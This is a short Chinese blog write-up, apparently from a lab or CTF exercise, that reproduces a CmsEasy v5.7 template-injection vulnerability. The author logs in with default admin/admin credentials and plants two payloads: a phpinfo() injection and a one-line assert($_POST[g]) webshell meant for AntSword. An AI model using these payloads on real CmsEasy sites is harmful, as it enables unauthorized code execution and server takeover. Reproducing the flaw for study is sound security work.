当前位置: 首页 > article >正文

【Web】CmsEasy 漏洞复现

访问主页

 到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

 CmsEasy_v5.7 漏洞测试

payload1:

1111111111";}<?php phpinfo()?>

 

 

payload2:

11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?


http://www.kler.cn/a/144409.html

相关文章:

  • 彩纸屋在线少儿编程源码/scratch在线编程系统/培训管理系统源码/在线培训系统源码PHP
  • Leetcode—55.跳跃游戏【中等】
  • 防止应用程序截屏(容器式,防止极域电子教室和录屏软件录制)
  • LVS+Keepalived 高可用群集
  • Ubuntu 22.04.3编译AOSP13刷机
  • 小程序中的大道理之二--抽象与封装
  • 毅速:3D打印随形透气钢为解决模具困气提供了新助力
  • EMQX-5.3.1单机集群部署并基于Nginx实现负载均衡
  • 飞翔的小鸟小游戏
  • 【数据结构】堆(C语言)
  • Java日志技术
  • OpenShift 4 - 部署 RHODS 环境,运行 AI/ML 应用(视频)
  • unbuntu下安装运行服务
  • 台球厅计时软件收费怎么设置时间,佳易王桌球计时计费灯控系统
  • github上不去
  • leetcode刷题详解二
  • Java 之 final 详解
  • 曲线拟合:走进数据建模中的艺术与科学
  • 【解锁未来】让微软Copilot介绍自己,再由ChatGPT润色文章,到底能成什么样?
  • 企业数字化转型的作用是什么?_光点科技